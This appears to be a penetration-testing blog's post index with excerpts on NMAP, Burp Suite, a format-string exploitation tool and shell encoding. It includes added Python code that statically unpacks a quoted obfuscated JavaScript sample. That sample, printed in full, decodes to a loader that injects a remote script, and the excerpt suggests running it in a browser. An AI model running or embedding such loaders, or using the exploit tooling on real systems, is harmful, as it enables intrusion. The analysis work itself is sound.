Following up on my last NMAP post, processing port scan data in a meaningful manner is essential to network penetration testing. For those who wish to skip the SQL stage and get quick results, the following one-liner will use xmlstarlet to parse an NMAP XML file: cat nmap.xml | xmlstarlet sel -T -t -m "//state[@state='open']" -m ../../.. -v address/@addr -m hostnames/hostname -i @name -o ' (' -v @name -o ')' -b -b -b -o " " -m .. -v @portid … →
Dangerous JavaScript Observed in the Wild
Today, we observed some potentially dangerous JavaScript client-side code out in the wild. The code, which we went to great lengths to obtain, is reproduced below: _0x65f5=["\x36\x3D\x5B\x22\x5C\x6A\x5C\x69\x5C\x61\x5C\x6E\x5C\x38\x5C\x62\x22\x2C\x22\x5C\x68\x5C\x61\x5C\x37\x5C\x6B\x5C\x62\x5C\x37\x5C\x6F\x5C\x66\x5C\x37\x5C\x70\x5C\x37\x5C\x67\x5C\x62\x22\x2C\x22\x5C\x6B\x5C\x38\x5C\x38\x5C\x37\x5C\x67\x5C\x39\x5C\x69\x5C\x65\x5C\x6D\x5C\x66\x5C\x39\x22\x2C\x22\x5C\x71\x5C\x72\x5C\x39\x5C\x6C\x22\x2C\x22\x5C\x6A\x5C\x61\x5C\x68\x22\x2C\x22\x5C\x63\x5C\x63\x5C\x38\x5C\x74\x5C\x79\x5C\x7A\x5C\x41\x5C\x78\x5C\x63\x5C\x65\x5C\x77\x22\x5D\x3B\x64\x3D\x75\x3B\x73\x3D\x64\x5B\x36\x5B\x31\x5D\x5D\x28\x36\x5B\x30\x5D\x29\x3B\x64\x5B\x36\x5B\x33\x5D\x5D\x5B\x36\x5B\x32\x5D\x5D\x28\x73\x29\x3B\x73\x5B\x36\x5B\x34\x5D\x5D\x3D\x36\x5B\x35\x5D\x3B\x76\x28\x30\x29\x3B","\x7C","\x73\x70\x6C\x69\x74","\x7C\x7C\x7C\x7C\x7C\x7C\x5F\x30\x78\x65\x30\x61\x32\x7C\x78\x36\x35\x7C\x78\x37\x30\x7C\x78\x36\x34\x7C\x78\x37\x32\x7C\x78\x37\x34\x7C\x78\x32\x46\x7C\x7C\x78\x36\x38\x7C\x78\x36\x43\x7C\x78\x36\x45\x7C\x78\x36\x33\x7C\x78\x34\x33\x7C\x78\x37\x33\x7C\x78\x36\x31\x7C\x78\x37\x39\x7C\x78\x36\x39\x7C\x78\x34\x39\x7C\x78\x34\x35\x7C\x78\x36\x44\x7C\x78\x36\x32\x7C\x78\x36\x46\x7C\x7C\x78\x33\x33\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x76\x4F\x49\x64\x7C\x78\x37\x41\x7C\x78\x35\x33\x7C\x78\x34\x45\x7C\x78\x32\x45\x7C\x78\x37\x35","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function (_0xf47fx1,_0xf47fx2,_0xf47fx3,_0xf47fx4,_0xf47fx5,_0xf47fx6){_0xf47fx5=function (_0xf47fx3){return (_0xf47fx3>35?String[_0x65f5[5]](_0xf47fx3+29):_0xf47fx3.toString(36));} ;if(!_0x65f5[4][_0x65f5[6]](/^/,String)){while(_0xf47fx3--){_0xf47fx6[_0xf47fx5(_0xf47fx3)]=_0xf47fx4[_0xf47fx3]||_0xf47fx5(_0xf47fx3);} ;_0xf47fx4=[function (_0xf47fx5){return _0xf47fx6[_0xf47fx5];} ];_0xf47fx5=function (){return _0x65f5[7];} ;_0xf47fx3=1;} ;while(_0xf47fx3--){if(_0xf47fx4[_0xf47fx3]){_0xf47fx1=_0xf47fx1[_0x65f5[6]]( new RegExp(_0x65f5[8]+_0xf47fx5(_0xf47fx3)+_0x65f5[8],_0x65f5[9]),_0xf47fx4[_0xf47fx3]);} ;} ;return _0xf47fx1;} (_0x65f5[0],37,37,_0x65f5[3][_0x65f5[2]](_0x65f5[1]),0,{})); For those brave of heart, you can test and execute it directly by putting it in your URL location bar preceded by javascript: as shown below (do this only in a throwaway browser profile, since it runs with whatever privileges the current page has): The first thing we recognized was the degree … →
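The eval wrapper in the sample is the familiar p,a,c,k,e,d packer: a program in which every keyword has been swapped for a short base-36 token, plus a '|'-separated table that maps tokens back to keywords, which the wrapper restores with a regex loop and then evaluates. That substitution can be reproduced without ever running the code. The Python below is an added example, not code from the post: it copies the two data strings from the eval call above (the packed program, and the keyword table, with the base and count 37 taken from the tail of the call), rebuilds the token-to-keyword substitution, and then decodes the \xHH escapes that remain so the strings become readable. On this sample the unpacked program is a short loader: an array of six strings, a createElement call for a script element, an appendChild onto document.body and an assignment to its src, which is exactly why the location-bar test should only ever be done in a disposable profile.

```python
import re

# The two data strings from the page's eval(...) call, copied verbatim: the packed
# program (_0x65f5[0]) and the '|'-separated keyword table (_0x65f5[3]). Python reads
# the same \xHH escapes as JavaScript, so the literals decode to identical text.
PACKED = "\x36\x3D\x5B\x22\x5C\x6A\x5C\x69\x5C\x61\x5C\x6E\x5C\x38\x5C\x62\x22\x2C\x22\x5C\x68\x5C\x61\x5C\x37\x5C\x6B\x5C\x62\x5C\x37\x5C\x6F\x5C\x66\x5C\x37\x5C\x70\x5C\x37\x5C\x67\x5C\x62\x22\x2C\x22\x5C\x6B\x5C\x38\x5C\x38\x5C\x37\x5C\x67\x5C\x39\x5C\x69\x5C\x65\x5C\x6D\x5C\x66\x5C\x39\x22\x2C\x22\x5C\x71\x5C\x72\x5C\x39\x5C\x6C\x22\x2C\x22\x5C\x6A\x5C\x61\x5C\x68\x22\x2C\x22\x5C\x63\x5C\x63\x5C\x38\x5C\x74\x5C\x79\x5C\x7A\x5C\x41\x5C\x78\x5C\x63\x5C\x65\x5C\x77\x22\x5D\x3B\x64\x3D\x75\x3B\x73\x3D\x64\x5B\x36\x5B\x31\x5D\x5D\x28\x36\x5B\x30\x5D\x29\x3B\x64\x5B\x36\x5B\x33\x5D\x5D\x5B\x36\x5B\x32\x5D\x5D\x28\x73\x29\x3B\x73\x5B\x36\x5B\x34\x5D\x5D\x3D\x36\x5B\x35\x5D\x3B\x76\x28\x30\x29\x3B"
KEYWORDS = "\x7C\x7C\x7C\x7C\x7C\x7C\x5F\x30\x78\x65\x30\x61\x32\x7C\x78\x36\x35\x7C\x78\x37\x30\x7C\x78\x36\x34\x7C\x78\x37\x32\x7C\x78\x37\x34\x7C\x78\x32\x46\x7C\x7C\x78\x36\x38\x7C\x78\x36\x43\x7C\x78\x36\x45\x7C\x78\x36\x33\x7C\x78\x34\x33\x7C\x78\x37\x33\x7C\x78\x36\x31\x7C\x78\x37\x39\x7C\x78\x36\x39\x7C\x78\x34\x39\x7C\x78\x34\x35\x7C\x78\x36\x44\x7C\x78\x36\x32\x7C\x78\x36\x46\x7C\x7C\x78\x33\x33\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x76\x4F\x49\x64\x7C\x78\x37\x41\x7C\x78\x35\x33\x7C\x78\x34\x45\x7C\x78\x32\x45\x7C\x78\x37\x35"
BASE, COUNT = 37, 37  # the (a, c) arguments at the tail of the eval call

ALPHABET = "0123456789abcdefghijklmnopqrstuvwxyz"


def encode_token(c, a):
    """The packer's e(c): the short name keyword number c was replaced with.
    Digits and lower-case letters cover 0..35; 36 and above become chr(c + 29),
    so with base 37 the 37th keyword is spelled 'A'."""
    prefix = "" if c < a else encode_token(c // a, a)
    c %= a
    return prefix + (chr(c + 29) if c > 35 else ALPHABET[c])


def unpack(packed, a, c, keywords):
    """Undo the packer statically: for c-1 down to 0, put keyword c back wherever its
    token appears as a whole word. An empty table entry means that token was never
    replaced, which is what the wrapper's `if (k[c])` test expresses."""
    for i in range(c - 1, -1, -1):
        if keywords[i]:
            token = re.escape(encode_token(i, a))
            packed = re.sub(r"\b" + token + r"\b", lambda m, word=keywords[i]: word, packed)
    return packed


def decode_js_hex(s):
    """Second layer: the strings inside the unpacked program are still \\xHH escapes."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), s)


def deobfuscate(packed=PACKED, keywords=KEYWORDS, a=BASE, c=COUNT):
    """Return (unpacked program as the wrapper would eval it, readable form)."""
    stage1 = unpack(packed, a, c, keywords.split("|"))
    return stage1, decode_js_hex(stage1)


if __name__ == "__main__":
    stage1, readable = deobfuscate()
    print("unpacked :", stage1)
    print("readable :", readable)
```

The two stages are kept separate because they are different tricks: the packer hides identifiers, the \xHH escapes hide string contents, and a sample may use either one on its own. Nothing here touches a JavaScript engine, so the decoded loader is never executed.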
Advanced Burp Suite Automation
By converting Burp Suite Professional’s session files to XML we were able to automate the analysis of the results with XMLStarlet on the command line. Using the IBurpExtender interface, we have now automated spidering and scanning in Burp as well: BurpExtender.java takes full advantage of the IBurpExtender interface and accepts a starting URL, output name, and optional cookie string on the command line. This tool will add the URL’s domain to Burp’s scope, and begin spidering the site, saving each … →
Keeping Current with Skipfish
This post discusses a tool to automatically check and keep a local copy of skipfish up-to-date. →
Burp Suite Professional to XML: BURP2XML
Burp Suite Professional’s session file is not in a useful format to extract data from. This post introduces a Python script that converts this session file to an XML document. →
Automatic Format String Exploitation
Here at Redspin, we don’t often get a chance to fool around with binaries. Nevertheless, during an audit we encountered a program with a simple format string attack. Not content with the manual format string exploitation process, we decided to write our own tool to automate it. After much coding, we saw that it was good, and decided to share: root@bt:~# wget http://www.redspin.com/blog/wp-files/Format%20String%20Auto%20Exploitation.tar.bz2 root@bt:~# tar jxvf Format\ String\ Auto\ Exploitation.tar.bz2 root@bt:~# cd Format\ String\ Auto\ Exploitation root@bt:~/Format String Auto Exploitation# … →
NMAP Database Output : XML TO SQL
One much requested feature of NMAP is SQL output. This tool attempts to bridge that gap by providing an XML2SQL conversion, and compares the database output to other similar tools. →
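The xmlstarlet one-liner from the first post above and the XML2SQL tool start from the same step: pulling every open port, with its host, out of NMAP's XML. The Python below is an added example, not the post's tool or the one-liner: it makes the same selection with the standard library (state[@state='open'], then back up to the enclosing host), prints the one-liner's "addr (hostname) port" shape with protocol and service added, and then loads the rows into SQLite so that a question such as "which hosts run http" becomes a query. The scan data is constructed for the example, and the two-table schema is an assumption of this example rather than the post's.

```python
import sqlite3
import xml.etree.ElementTree as ET

# Constructed NMAP XML, not output from a real scan: two hosts, one with a PTR
# hostname, and one filtered port that must not appear in the results.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -oX nmap.xml 10.0.0.0/28">
  <host>
    <status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac"/>
    <hostnames><hostname name="web.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="filtered"/></port>
    </ports>
  </host>
  <host>
    <status state="up"/>
    <address addr="10.0.0.9" addrtype="ipv4"/>
    <hostnames/>
    <ports>
      <port protocol="udp" portid="161"><state state="open"/><service name="snmp"/></port>
    </ports>
  </host>
</nmaprun>
"""


def open_ports(xml_text):
    """Every open port with its host: the selection the xmlstarlet one-liner makes
    with //state[@state='open'] followed by ../../.. to the enclosing <host>."""
    rows = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:  # IPv6-only host: take whatever address NMAP recorded first
            addr = host.find("address")
        if addr is None:
            continue
        hn = host.find("hostnames/hostname")
        hostname = hn.get("name") if hn is not None else None
        for port in host.iterfind("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            rows.append((addr.get("addr"), hostname, port.get("protocol"),
                         int(port.get("portid")), svc.get("name") if svc is not None else None))
    return rows


def format_rows(rows):
    """The one-liner's 'addr (hostname) port' shape, plus protocol and service name."""
    out = []
    for addr, hostname, proto, portid, service in rows:
        label = f"{addr} ({hostname})" if hostname else addr
        out.append(f"{label} {portid}/{proto}" + (f" {service}" if service else ""))
    return out


# Assumed schema for this example: one row per host, one per (host, protocol, port).
SCHEMA = """
CREATE TABLE IF NOT EXISTS hosts (
    id       INTEGER PRIMARY KEY,
    addr     TEXT NOT NULL UNIQUE,
    hostname TEXT
);
CREATE TABLE IF NOT EXISTS ports (
    host_id  INTEGER NOT NULL REFERENCES hosts(id),
    protocol TEXT    NOT NULL,
    portid   INTEGER NOT NULL,
    service  TEXT,
    PRIMARY KEY (host_id, protocol, portid)
);
"""


def build_db(xml_text, path=":memory:"):
    """Load the open ports into SQLite. The primary keys make a re-run of the same
    scan an upsert rather than a pile of duplicate rows."""
    conn = sqlite3.connect(path)
    conn.executescript(SCHEMA)
    for addr, hostname, proto, portid, service in open_ports(xml_text):
        conn.execute("INSERT OR IGNORE INTO hosts (addr, hostname) VALUES (?, ?)", (addr, hostname))
        (host_id,) = conn.execute("SELECT id FROM hosts WHERE addr = ?", (addr,)).fetchone()
        conn.execute("INSERT OR REPLACE INTO ports VALUES (?, ?, ?, ?)",
                     (host_id, proto, portid, service))
    conn.commit()
    return conn


def hosts_running(conn, service):
    """Addresses exposing a given service name: the kind of question SQL output is for."""
    return [addr for (addr,) in conn.execute(
        "SELECT DISTINCT h.addr FROM hosts h JOIN ports p ON p.host_id = h.id "
        "WHERE p.service = ? ORDER BY h.addr", (service,))]


if __name__ == "__main__":
    print("\n".join(format_rows(open_ports(SAMPLE_NMAP_XML))))
    db = build_db(SAMPLE_NMAP_XML)
    print("hosts running http:", hosts_running(db, "http"))
```

Pass a file path instead of ":memory:" to keep the database between scans; because the tables are keyed on address and (host, protocol, port), loading a second -oX file of the same range updates service names in place instead of duplicating rows.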
String Encoding in the Shell
Data encoding in the shell is a quick and reliable way to convert input from one format to another. This can be done in order to determine how an application has transformed your input, or to encode your input in such a way as to bypass a security filter. Useful encodings include HEX, HTML, URL, various password representations, common hashes and even some compression encodings. What follows are some of my favourite … →
Sed, Grep and Awk
Sed, Grep and Awk are true *nix tools, known for their awkward names and equally awkward syntax. They represent the most immediate access to Regular Expressions (REs), which are themselves worthy of study. Even their attempted replacement, Perl, is known for producing useful yet unreadable code. Though I acknowledge their awkward natures, their usefulness cannot be ignored, and learning how to use each will aid you in your ascension to line processing supremacy. Each is best used in the following … →



